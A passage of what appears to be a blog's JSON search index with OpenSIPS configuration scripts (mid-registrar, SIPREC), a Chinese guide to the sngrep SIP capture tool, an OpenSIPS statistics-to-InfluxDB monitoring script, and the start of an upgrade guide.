modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_mode\u0026#34;, 0666) #### URI module loadmodule \u0026#34;uri.so\u0026#34; modparam(\u0026#34;uri\u0026#34;, \u0026#34;use_uri_table\u0026#34;, 0) #### USeR LOCation module loadmodule \u0026#34;usrloc.so\u0026#34; modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;nat_bflag\u0026#34;, \u0026#34;NAT\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) #### REGISTRAR module loadmodule \u0026#34;registrar.so\u0026#34; /* uncomment the next line not to allow more than 10 contacts per AOR */ #modparam(\u0026#34;registrar\u0026#34;, \u0026#34;max_contacts\u0026#34;, 10) #### ACCounting module loadmodule \u0026#34;acc.so\u0026#34; /* what special events should be accounted ? */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) /* by default we do not adjust the direct of the sequential requests. if you enable this parameter, be sure the enable \u0026#34;append_fromtag\u0026#34; in \u0026#34;rr\u0026#34; module */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) #### UDP protocol loadmodule \u0026#34;proto_udp.so\u0026#34; ####### Routing Logic ######## # main request routing logic route{ if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; } if (has_totag()) { # sequential requests within a dialog should # take the path determined by record-routing if (loose_route()) { if (is_method(\u0026#34;BYE\u0026#34;)) { # do accunting, even if the transaction fails do_accounting(\u0026#34;log\u0026#34;,\u0026#34;failed\u0026#34;); } else if (is_method(\u0026#34;INVITE\u0026#34;)) { # even if in most of the cases is useless, do RR for # re-INVITEs alos, as some buggy clients do change route set # during the dialog. record_route(); } # route it out to whatever destination was set by loose_route() # in $du (destination URI). route(relay); } else { if ( is_method(\u0026#34;ACK\u0026#34;) ) { if ( t_check_trans() ) { # non loose-route, but stateful ACK; must be an ACK after # a 487 or e.g. 404 from upstream server t_relay(); exit; } else { # ACK without matching transaction -\u0026gt; # ignore and discard exit; } } sl_send_reply(\u0026#34;404\u0026#34;,\u0026#34;Not here\u0026#34;); } exit; } # CANCEL processing if (is_method(\u0026#34;CANCEL\u0026#34;)) { if (t_check_trans()) t_relay(); exit; } t_check_trans(); if (is_method(\u0026#34;REGISTER\u0026#34;)) { mid_registrar_save(\u0026#34;location\u0026#34;); switch ($retcode) { case 1: xlog(\u0026#34;forwarding REGISTER to main registrar ($$ci=$ci)\\n\u0026#34;); $ru = \u0026#34;sip:10.0.0.3:5070\u0026#34;; t_relay(); break; case 2: xlog(\u0026#34;absorbing REGISTER! ($$ci=$ci)\\n\u0026#34;); break; default: xlog(\u0026#34;failed to save registration! ($$ci=$ci)\\n\u0026#34;); } exit; } # preloaded route checking if (loose_route()) { xlog(\u0026#34;L_ERR\u0026#34;, \u0026#34;Attempt to route with preloaded Route\u0026#39;s [$fu/$tu/$ru/$ci]\u0026#34;); if (!is_method(\u0026#34;ACK\u0026#34;)) sl_send_reply(\u0026#34;403\u0026#34;,\u0026#34;Preload Route denied\u0026#34;); exit; } # record routing if (!is_method(\u0026#34;REGISTER|MESSAGE\u0026#34;)) record_route(); # account only INVITEs if (is_method(\u0026#34;INVITE\u0026#34;)) { do_accounting(\u0026#34;log\u0026#34;); } if (!uri==myself) { append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); route(relay); } # requests for my domain if (is_method(\u0026#34;PUBLISH|SUBSCRIBE\u0026#34;)) { sl_send_reply(\u0026#34;503\u0026#34;, \u0026#34;Service Unavailable\u0026#34;); exit; } if ($rU==NULL) { # request with no Username in RURI sl_send_reply(\u0026#34;484\u0026#34;,\u0026#34;Address Incomplete\u0026#34;); exit; } # initial requests from main registrar, need to look them up! if (is_method(\u0026#34;INVITE|MESSAGE\u0026#34;) \u0026amp;\u0026amp; $si == \u0026#34;10.0.0.3\u0026#34; \u0026amp;\u0026amp; $sp == 5070) { xlog(\u0026#34;looking up $ru!\\n\u0026#34;); if (!mid_registrar_lookup(\u0026#34;location\u0026#34;)) { t_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; } t_relay(); exit; } # when routing via usrloc, log the missed calls also do_accounting(\u0026#34;log\u0026#34;,\u0026#34;missed\u0026#34;); route(relay); } route[relay] { # for INVITEs enable some additional helper routes if (is_method(\u0026#34;INVITE\u0026#34;)) { t_on_branch(\u0026#34;per_branch_ops\u0026#34;); t_on_reply(\u0026#34;handle_nat\u0026#34;); t_on_failure(\u0026#34;missed_call\u0026#34;); } if (!t_relay()) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Internal Error\u0026#34;); }; exit; } branch_route[per_branch_ops] { xlog(\u0026#34;new branch at $ru\\n\u0026#34;); } onreply_route[handle_nat] { xlog(\u0026#34;incoming reply\\n\u0026#34;); } failure_route[missed_call] { if (t_was_cancelled()) { exit; } # uncomment the following lines if you want to block client # redirect based on 3xx replies. ##if (t_check_status(\u0026#34;3[0-9][0-9]\u0026#34;)) { ##t_reply(\u0026#34;404\u0026#34;,\u0026#34;Not found\u0026#34;); ##\texit; ##} } ","permalink":"https://wdd.js.org/opensips/ch8/mid-register/","summary":"# # $Id$ # # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. # ####### Global Parameters ######### log_level=4 log_stderror=yes log_facility=LOG_LOCAL0 children=4 /* uncomment the following line to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen=udp:10.","title":"mid-registrar"},{"content":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. # ####### Global Parameters ######### log_level=3 log_stderror=no log_facility=LOG_LOCAL0 children=4 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen=udp:127.0.0.1:5060 ####### Modules Section ######## #set module path mpath=\u0026#34;modules/\u0026#34; #### SIGNALING module loadmodule \u0026#34;signaling.so\u0026#34; #### StateLess module loadmodule \u0026#34;sl.so\u0026#34; #### Transaction Module loadmodule \u0026#34;tm.so\u0026#34; modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timeout\u0026#34;, 5) modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_inv_timeout\u0026#34;, 30) modparam(\u0026#34;tm\u0026#34;, \u0026#34;restart_fr_on_each_reply\u0026#34;, 0) modparam(\u0026#34;tm\u0026#34;, \u0026#34;onreply_avp_mode\u0026#34;, 1) #### Record Route Module loadmodule \u0026#34;rr.so\u0026#34; /* do not append from tag to the RR (no need for this script) */ modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) #### MAX ForWarD module loadmodule \u0026#34;maxfwd.so\u0026#34; #### SIP MSG OPerationS module loadmodule \u0026#34;sipmsgops.so\u0026#34; #### FIFO Management Interface loadmodule \u0026#34;mi_fifo.so\u0026#34; modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_mode\u0026#34;, 0666) #### URI module loadmodule \u0026#34;uri.so\u0026#34; modparam(\u0026#34;uri\u0026#34;, \u0026#34;use_uri_table\u0026#34;, 0) #### USeR LOCation module loadmodule \u0026#34;usrloc.so\u0026#34; modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;nat_bflag\u0026#34;, \u0026#34;NAT\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) #### REGISTRAR module loadmodule \u0026#34;registrar.so\u0026#34; modparam(\u0026#34;registrar\u0026#34;, \u0026#34;tcp_persistent_flag\u0026#34;, \u0026#34;TCP_PERSISTENT\u0026#34;) /* uncomment the next line not to allow more than 10 contacts per AOR */ #modparam(\u0026#34;registrar\u0026#34;, \u0026#34;max_contacts\u0026#34;, 10) #### ACCounting module loadmodule \u0026#34;acc.so\u0026#34; /* what special events should be accounted ? */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) /* by default we do not adjust the direct of the sequential requests. if you enable this parameter, be sure the enable \u0026#34;append_fromtag\u0026#34; in \u0026#34;rr\u0026#34; module */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) loadmodule \u0026#34;proto_udp.so\u0026#34; loadmodule \u0026#34;dialog.so\u0026#34; loadmodule \u0026#34;b2b_entities.so\u0026#34; loadmodule \u0026#34;siprec.so\u0026#34; loadmodule \u0026#34;rtpproxy.so\u0026#34; modparam(\u0026#34;rtpproxy\u0026#34;, \u0026#34;rtpproxy_sock\u0026#34;, \u0026#34;udp:127.0.0.1:7899\u0026#34;) ####### Routing Logic ######## # main request routing logic route{ if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; } if (has_totag()) { # handle hop-by-hop ACK (no routing required) if ( is_method(\u0026#34;ACK\u0026#34;) \u0026amp;\u0026amp; t_check_trans() ) { t_relay(); exit; } # sequential request within a dialog should # take the path determined by record-routing if ( !loose_route() ) { # we do record-routing for all our traffic, so we should not # receive any sequential requests without Route hdr. sl_send_reply(\u0026#34;404\u0026#34;,\u0026#34;Not here\u0026#34;); exit; } if (is_method(\u0026#34;BYE\u0026#34;)) { # do accounting even if the transaction fails do_accounting(\u0026#34;log\u0026#34;,\u0026#34;failed\u0026#34;); } # route it out to whatever destination was set by loose_route() # in $du (destination URI). route(relay); exit; } # CANCEL processing if (is_method(\u0026#34;CANCEL\u0026#34;)) { if (t_check_trans()) t_relay(); exit; } t_check_trans(); if ( !(is_method(\u0026#34;REGISTER\u0026#34;) ) ) { if (is_myself(\u0026#34;$fd\u0026#34;)) { } else { # if caller is not local, then called number must be local if (!is_myself(\u0026#34;$rd\u0026#34;)) { send_reply(\u0026#34;403\u0026#34;,\u0026#34;Rely forbidden\u0026#34;); exit; } } } # preloaded route checking if (loose_route()) { xlog(\u0026#34;L_ERR\u0026#34;, \u0026#34;Attempt to route with preloaded Route\u0026#39;s [$fu/$tu/$ru/$ci]\u0026#34;); if (!is_method(\u0026#34;ACK\u0026#34;)) sl_send_reply(\u0026#34;403\u0026#34;,\u0026#34;Preload Route denied\u0026#34;); exit; } # record routing if (!is_method(\u0026#34;REGISTER|MESSAGE\u0026#34;)) record_route(); # account only INVITEs if (is_method(\u0026#34;INVITE\u0026#34;)) { create_dialog(); rtpproxy_engage(); siprec_start_recording(\u0026#34;sip:127.0.0.1:5090\u0026#34;); do_accounting(\u0026#34;log\u0026#34;); } if (!is_myself(\u0026#34;$rd\u0026#34;)) { append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); route(relay); } # requests for my domain if (is_method(\u0026#34;PUBLISH|SUBSCRIBE\u0026#34;)) { sl_send_reply(\u0026#34;503\u0026#34;, \u0026#34;Service Unavailable\u0026#34;); exit; } if (is_method(\u0026#34;REGISTER\u0026#34;)) { if (!save(\u0026#34;location\u0026#34;)) sl_reply_error(); exit; } if ($rU==NULL) { # request with no Username in RURI sl_send_reply(\u0026#34;484\u0026#34;,\u0026#34;Address Incomplete\u0026#34;); exit; } # do lookup with method filtering if (!lookup(\u0026#34;location\u0026#34;,\u0026#34;m\u0026#34;)) { t_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; } # when routing via usrloc, log the missed calls also do_accounting(\u0026#34;log\u0026#34;,\u0026#34;missed\u0026#34;); route(relay); } route[relay] { # for INVITEs enable some additional helper routes if (is_method(\u0026#34;INVITE\u0026#34;)) { t_on_branch(\u0026#34;per_branch_ops\u0026#34;); t_on_reply(\u0026#34;handle_nat\u0026#34;); t_on_failure(\u0026#34;missed_call\u0026#34;); } if (!t_relay()) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Internal Error\u0026#34;); }; exit; } branch_route[per_branch_ops] { xlog(\u0026#34;new branch at $ru\\n\u0026#34;); } onreply_route[handle_nat] { xlog(\u0026#34;incoming reply\\n\u0026#34;); } failure_route[missed_call] { if (t_was_cancelled()) { exit; } # uncomment the following lines if you want to block client # redirect based on 3xx replies. ##if (t_check_status(\u0026#34;3[0-9][0-9]\u0026#34;)) { ##t_reply(\u0026#34;404\u0026#34;,\u0026#34;Not found\u0026#34;); ##\texit; ##} } ","permalink":"https://wdd.js.org/opensips/ch8/siprec/","summary":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. # ####### Global Parameters ######### log_level=3 log_stderror=no log_facility=LOG_LOCAL0 children=4 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen=udp:127.","title":"siprec"},{"content":"1. 安装 1.1. centos vim /etc/yum.repos.d/irontec.repo\n[irontec] name=Irontec RPMs repository baseurl=http://packages.irontec.com/centos/$releasever/$basearch/ rpm \u0026ndash;import http://packages.irontec.com/public.keyyum install sngrep\n1.2 debian/ubuntu # debian 安装sngrep echo \u0026#34;deb http://packages.irontec.com/debian jessie main\u0026#34; \u0026gt;\u0026gt; /etc/apt/sources.list wget http://packages.irontec.com/public.key -q -O - | apt-key add - apt-get install sngrep -y debian buster 即 debian10以上可以直接 apt-get install sngrep 1.3 arch/manjaro yay -Syu sngrep 参考: https://aur.archlinux.org/packages/sngrep/\n如果报错,编辑 /etc/makepkg.conf文件,删除其中的-Werror=format-security\nCFLAGS=\u0026#34;-march=x86-64 -mtune=generic -O2 -pipe -fno-plt -fexceptions \\ -Wp,-D_FORTIFY_SOURCE=2 -Wformat -Werror=format-security \\ -fstack-clash-protection -fcf-protection\u0026#34; 2. 命令行参数 sngrep [-hVcivNqrD] [-IO pcap_dump] [-d dev] [-l limit] [-k keyfile] [-LH capture_url] [\u0026lt;match expression\u0026gt;] [\u0026lt;bpf filter\u0026gt;] -h --help: 显示帮助信息 -V --version: 显示版本信息 -d --device: 指定抓包的网卡 -I --input: 从pacp文件中解析sip包 -O --output: 输出捕获的包到pacp文件中 -c --calls: 仅显示invite消息 -r --rtp: Capture RTP packets payload 捕获rtp包 -l --limit: 限制捕获对话的数量 -i --icase: 使大小写不敏感 -v --invert: 颠倒(不太明白) -N --no-interface: Don\u0026rsquo;t display sngrep interface, just capture -q --quiet: Don\u0026rsquo;t print captured dialogs in no interface mode -D --dump-config: Print active configuration settings and exit -f --config: Read configuration from file -R --rotate: Rotate calls when capture limit have been reached. -H --eep-send: Homer sipcapture url (udp:X.X.X.X:XXXX) -L --eep-listen: Listen for encapsulated packets (udp:X.X.X.X:XXXX) -k --keyfile: RSA private keyfile to decrypt captured packets 3. 页面 sngrep有四个页面,每个页面都有一些不同的快捷键。\n呼叫列表页面 呼叫流程页面 原始呼叫信息页面 信息对比页面 3.1 呼叫列表页面 快捷键\nArrow keys: Move through the list,除了上下箭头还可以使用j,k来移动光标 Enter: Display current or selected dialog(s) message flow A: Auto scroll to new calls,自动滚动到新的call F2 or s: Save selected/all dialog(s) to a PCAP file, 保存dialog到pacp文件 F3 or / or TAB: Enter a display filter. This filter will be applied to the text lines in the list,进入搜索 F4 or x: Display current selected dialog and its related one. 回到第一个sip消息上 F5: Clear call list, 清空呼叫列表 F6 or r: Display selected dialog(s) messages in raw text, 显示原始的sip消息 F7 or f: Show advanded filters dialogs 显示高级过滤弹窗 F9 or l: Turn on/off address resolution if enabled F10 or t: Select displayed columns, 显示或者隐藏侧边sip消息栏 呼叫列表页面还能够显示两个弹窗, 按f可以显示高级过滤配置\n按t可以显示, 自定义呼叫列选项弹窗\n3.2 呼叫流程页面 快捷键\n**Keybindings:\nArrow keys: Move through messages Enter: Display current message raw (so you can copy payload) F2 or d: 显示sdp消息,f2的某个模式会让时序图更紧凑 F3 or t: 显示或者关闭sip侧边栏 F4 or x: 回到顶部 F5 or s: 每个ip地址仅仅显示一列 F6 or R: 显示原始的sip消息 F7 or c: 改变颜色模式, 有的颜色模式很容易让人无法区分当前查看的sip消息是哪一个,所以需要改变颜色模式 F9 or l: Turn on/off address resolution if enabled 9 and 0: 增加或者减少侧边栏的宽度 T: 重绘侧边栏 D: 仅显示带有sdp的消息 空格键:选中一个sip消息,再次找个sip消息,然后就会进入对比模式 F1 or h: 显式帮助信息页面 3.3 原始sip消息界面 3.3 消息对比界面 在呼叫列表页面按空格键选中一个消息,然后选择另外一个sip消息后,再次按空格键,就可以进入消息对比页面\n4. 分析媒体问题 使用 sngrep -r 可以用来捕获媒体流,默认不加 -r 则只能显示信令。\n在呼叫流程页面,按下F3, 可以动态的查看媒体流的情况。在分析语音问题时,这是非常方便的分析工具。 5. 扩展技法 5.1 无界面模式 假如说有个很大的语音文件,假如说有1.5G吧,如果用wireshark直接打开,有可能wireshark直接卡死,也有可能在搜索的时候就崩溃了。\n即使有sngrep来直接读取pcap文件,也可能会非常慢。\n假如说我们只想从这1.5G文件中找到本叫号码包含1234的,应该怎么处理呢?\n用下面的命令就可以:\nsngrep -rI test.pcap 1234 -N -O dst.pcap Dialog count: 17 -r 读区语音流 -I 从pcap文件中读取 -N 不要界面 -O 将匹配的结果写到其他文件中 经过上面的命令,一个很大的pcap文件,在处理之后,就会变成我们关心的小的包文件。比较容易处理了。\n5.1 个性化配置 在呼叫列表界面,按F8可以进入到个性化配置界面,如下:\n个性化配置页面有三个Tab页面, 三个页面可以用翻页的pageUp, pageDown来切换。在macbook上可能没有翻页键,那你要用fn + 上下方向键 来翻页\nInterface Capture Call Flow 在每个页面可以用上下键来选择不同的设置项,按左右键改变对应的值。也可以按空格键来改变对应的值。\n在每个Tab页面,可以按Tab键在设置项和下面的Accept和Save、Cancel之间切换。\n我们的个性化配置可以用Save来保存下来,不然每次都要再设置一边。\n1. interface 页面 2. Capture设置界面 配置抓包相关的信息,例如最大抓包的数量,网卡设备,是否启用事务,默认的保存文件路径等等。 3. Call Flow页面 这个页面用来设置呼叫时序图页面。就不再过多介绍。\n我用的比较多的,可能是Merge Columns witch same addrsss。 sngrep默认用IP:PORT作为时序图中的一个竖线。但是如果IP相同,端口号不同。sngrep就会划出很多竖线。启用了改项之后,就只会根据IP来划竖线。 区分IP和端口: Merge columns with same address on 表示只根据IP来划竖线 off 表示根据IP:PORT来划线,如果你想在竖线上能看到端口信息,则需要设置为off 如下图所示,Merge columns with same address: off 如何更容易区分当前是在哪一信令上? 有时候移动的快一点,例如只能看到SIP消息是REGISTER, 但是具体是哪一个REGISTER, 看的眼疼也区分不出来。 这时候Call Flow中的Selected message highlight就派上用场。\nblod 加粗 reverse 反色 reverseblod 反色并且加粗 一般情况下,reverse或者reverseblod都能让你更好的区分,下面就是使用reverser模式下的时序图\n可以很明显的看到,第三个REGISTER的背景色变一大块,所以当前就是在第三个REGISTER信令上。 6 . sngrep使用注意点 不要长时间用sngrep抓包,否则sgrep会占用非常多的内存。如果必须抓一段时间的包,务必使用tcpdump。 某些情况下,sngrep会丢包 某些情况下,sngrep会什么包都抓包不到,注意此时很可能要使用-d去指定抓包的网卡 sngrep只能捕获本机网卡的收到和发送的流量。假如ABC分别是三台独立虚拟机的SIP服务器,在B上抓包只能分析A-B, 和B-C直接的流量。 再次强调:sngrep不适合长时间抓包,只适合短时间抓包分析问题。如果你需要记录所有的sip消息,并展示。可以考虑使用siphub,或者homer。 ","permalink":"https://wdd.js.org/opensips/tools/sngrep/","summary":"1. 安装 1.1. centos vim /etc/yum.repos.d/irontec.repo\n[irontec] name=Irontec RPMs repository baseurl=http://packages.irontec.com/centos/$releasever/$basearch/ rpm \u0026ndash;import http://packages.irontec.com/public.keyyum install sngrep\n1.2 debian/ubuntu # debian 安装sngrep echo \u0026#34;deb http://packages.irontec.com/debian jessie main\u0026#34; \u0026gt;\u0026gt; /etc/apt/sources.list wget http://packages.irontec.com/public.key -q -O - | apt-key add - apt-get install sngrep -y debian buster 即 debian10以上可以直接 apt-get install sngrep 1.3 arch/manjaro yay -Syu sngrep 参考: https://aur.archlinux.org/packages/sngrep/\n如果报错,编辑 /etc/makepkg.conf文件,删除其中的-Werror=format-security\nCFLAGS=\u0026#34;-march=x86-64 -mtune=generic -O2 -pipe -fno-plt -fexceptions \\ -Wp,-D_FORTIFY_SOURCE=2 -Wformat -Werror=format-security \\ -fstack-clash-protection -fcf-protection\u0026#34; 2.","title":"sngrep: 最好用的sip可视化抓包工具"},{"content":"**opensipsctl fifo get_statistics all **命令可以获取所有统计数据,在所有统计数据中,我们只关心内存,事务和回话的数量。然后将数据使用curl工具写入到influxdb中。\nopensipsctl fifo reset_statistics all 重置统计数据\n常用指令 命令 描述 opensipsctl fifo which 显示所有可用命令 opensipsctl fifo ps 显示所有进程 opensipsctl fifo get_statistics all 获取所有统计信息 opensipsctl fifo get_statistics core: 获取内核统计信息 opensipsctl fifo get_statistics net: 获取网路统计信息 opensipsctl fifo get_statistics pkmem: 获取私有内存相关信息 opensipsctl fifo get_statistics tm: 获取事务模块统计信息 opensipsctl fifo get_statistics sl: 获取sl模块统计信息 opensipsctl fifo get statistics shmem: 获取共享内存相关信息 opensipsctl fifo get statistics usrloc: 获取 opensipsctl fifo get statistics registrar: 获取注册统计信息 opensipsctl fifo get statistics uri: 获取uri统计信息 opensipsctl fifo get statistics load: 获取负载信息 opensipsctl fifo reset_statistics all 重置所有统计信息 shmem:total_size:: 6467616768 shmem:used_size:: 4578374040 shmem:real_used_size:: 4728909408 shmem:max_used_size:: 4728909408 shmem:free_size:: 1738707360 shmem:fragments:: 1 # 事务 tm:UAS_transactions:: 296337 tm:UAC_transactions:: 30 tm:2xx_transactions:: 174737 tm:3xx_transactions:: 0 tm:4xx_transactions:: 110571 tm:5xx_transactions:: 2170 tm:6xx_transactions:: 0 tm:inuse_transactions:: 289651 dialog:active_dialogs:: 156 dialog:early_dialogs:: 680 dialog:processed_dialogs:: 104061 dialog:expired_dialogs:: 964 dialog:failed_dialogs:: 78457 dialog:create_sent:: 0 dialog:update_sent:: 0 dialog:delete_sent:: 0 dialog:create_recv:: 0 dialog:update_recv:: 0 dialog:delete_recv:: 0 CONF_DB_URL=\u0026#34;ip:port\u0026#34; # influxdb地址 CONF_DB_NAME=\u0026#34;dbname\u0026#34; # influxdb数据库名 CONF_OPENSIPS_ROLE=\u0026#34;a\u0026#34; # 角色,随便写个字符串 PATH=\u0026#34;/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/root/bin\u0026#34; LOCAL_IP=`ip route get 8.8.8.8 | head -n +1 | tr -s \u0026#34; \u0026#34; | cut -d \u0026#34; \u0026#34; -f 7` MSG=`opensipsctl fifo get_statistics all | grep -E \u0026#34;tm:|shmem:|dialog\u0026#34; | awk -F \u0026#39;:: \u0026#39; \u0026#39;BEGIN{OFS=\u0026#34;=\u0026#34;;ORS=\u0026#34;,\u0026#34;} {print $1,$2}\u0026#39; | sed \u0026#39;s/[-:.]/_/g\u0026#39;` MSG=${MSG:0:${#MSG}-1} echo $MSG influxdb=\u0026#34;http://$CONF_DB_URL/write?db=$CONF_DB_NAME\u0026#34; curl -i -XPOST $influxdb --data-binary \u0026#34;opensips,type=$CONF_OPENSIPS_ROLE,ip=$LOCAL_IP $MSG\u0026#34; shmem:total_size:: 33554432shmem:used_size:: 2910624shmem:real_used_size:: 3722856shmem:max_used_size:: 21963544shmem:free_size:: 29831576shmem:fragments:: 30761core:rcv_requests:: 1625972core:rcv_replies:: 580098core:fwd_requests:: 26146core:fwd_replies:: 0core:drop_requests:: 27core:drop_replies:: 0core:err_requests:: 0core:err_replies:: 0core:bad_URIs_rcvd:: 0core:unsupported_methods:: 0core:bad_msg_hdr:: 0core:timestamp:: 179429net:waiting_udp:: 0net:waiting_tcp:: 0sl:1xx_replies:: 0sl:2xx_replies:: 930643sl:3xx_replies:: 0sl:4xx_replies:: 265459sl:5xx_replies:: 168472sl:6xx_replies:: 0sl:sent_replies:: 1364574sl:sent_err_replies:: 0sl:received_ACKs:: 27tm:received_replies:: 570374tm:relayed_replies:: 402332tm:local_replies:: 155868tm:UAS_transactions:: 181106tm:UAC_transactions:: 71770tm:2xx_transactions:: 117167tm:3xx_transactions:: 0tm:4xx_transactions:: 138052tm:5xx_transactions:: 29tm:6xx_transactions:: 0tm:inuse_transactions:: 2uri:positive checks:: 195024uri:negative_checks:: 0usrloc:registered_users:: 0usrloc:location-users:: 0usrloc:location-contacts:: 0usrloc:location-expires:: 0registrar:max_expires:: 180registrar:max_contacts:: 1registrar:default_expire:: 150registrar:accepted_regs:: 110781registrar:rejected_regs:: 84236dialog:active_dialogs:: 0dialog:early_dialogs:: 0dialog:processed_dialogs:: 150397dialog:expired_dialogs:: 0dialog:failed_dialogs:: 137297dialog:create_sent:: 0dialog:update_sent:: 0dialog:delete_sent:: 0dialog:create_recv:: 0dialog:update_recv:: 0dialog:delete_recv:: 0\n","permalink":"https://wdd.js.org/opensips/ch3/opensips-monitor/","summary":"**opensipsctl fifo get_statistics all **命令可以获取所有统计数据,在所有统计数据中,我们只关心内存,事务和回话的数量。然后将数据使用curl工具写入到influxdb中。\nopensipsctl fifo reset_statistics all 重置统计数据\n常用指令 命令 描述 opensipsctl fifo which 显示所有可用命令 opensipsctl fifo ps 显示所有进程 opensipsctl fifo get_statistics all 获取所有统计信息 opensipsctl fifo get_statistics core: 获取内核统计信息 opensipsctl fifo get_statistics net: 获取网路统计信息 opensipsctl fifo get_statistics pkmem: 获取私有内存相关信息 opensipsctl fifo get_statistics tm: 获取事务模块统计信息 opensipsctl fifo get_statistics sl: 获取sl模块统计信息 opensipsctl fifo get statistics shmem: 获取共享内存相关信息 opensipsctl fifo get statistics usrloc: 获取 opensipsctl fifo get statistics registrar: 获取注册统计信息 opensipsctl fifo get statistics uri: 获取uri统计信息 opensipsctl fifo get statistics load: 获取负载信息 opensipsctl fifo reset_statistics all 重置所有统计信息 shmem:total_size:: 6467616768 shmem:used_size:: 4578374040 shmem:real_used_size:: 4728909408 shmem:max_used_size:: 4728909408 shmem:free_size:: 1738707360 shmem:fragments:: 1 # 事务 tm:UAS_transactions:: 296337 tm:UAC_transactions:: 30 tm:2xx_transactions:: 174737 tm:3xx_transactions:: 0 tm:4xx_transactions:: 110571 tm:5xx_transactions:: 2170 tm:6xx_transactions:: 0 tm:inuse_transactions:: 289651 dialog:active_dialogs:: 156 dialog:early_dialogs:: 680 dialog:processed_dialogs:: 104061 dialog:expired_dialogs:: 964 dialog:failed_dialogs:: 78457 dialog:create_sent:: 0 dialog:update_sent:: 0 dialog:delete_sent:: 0 dialog:create_recv:: 0 dialog:update_recv:: 0 dialog:delete_recv:: 0 CONF_DB_URL=\u0026#34;ip:port\u0026#34; # influxdb地址 CONF_DB_NAME=\u0026#34;dbname\u0026#34; # influxdb数据库名 CONF_OPENSIPS_ROLE=\u0026#34;a\u0026#34; # 角色,随便写个字符串 PATH=\u0026#34;/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/root/bin\u0026#34; LOCAL_IP=`ip route get 8.","title":"opensips监控"},{"content":"环境声明 系统 centos7 已经安装opensips 2.2 需要升级目标 opensips 2.4.6 要求:当前系统上没有部署mysql服务端程序 升级步骤 升级分为两步\nopensips 应用升级,包括源码的下载,编译等等 opensips 数据库升级,使用opensipsdbctl工具迁移老的数据 Edge: opensips应用升级 升级过程以Makefile交付,可以先新建一个空的目录,如 /root/opensips-update/\n# file: /root/opensips-update/Makefile VERSION=2.4.6 download: wget https://opensips.org/pub/opensips/$(VERSION)/opensips-$(VERSION).tar.gz; tar -zxvf opensips-$(VERSION).tar.gz; build: cd opensips-$(VERSION); make all -j4 include_modules=\u0026#34;db_mysql httpd db_http siprec\u0026#34;; # siprec是可选的 make install include_modules=\u0026#34;db_mysql httpd db_http siprec\u0026#34;; # siprec是可选的 新建空目录/root/opensips-update/ 在新目录中创建名为 Makefile的文件, 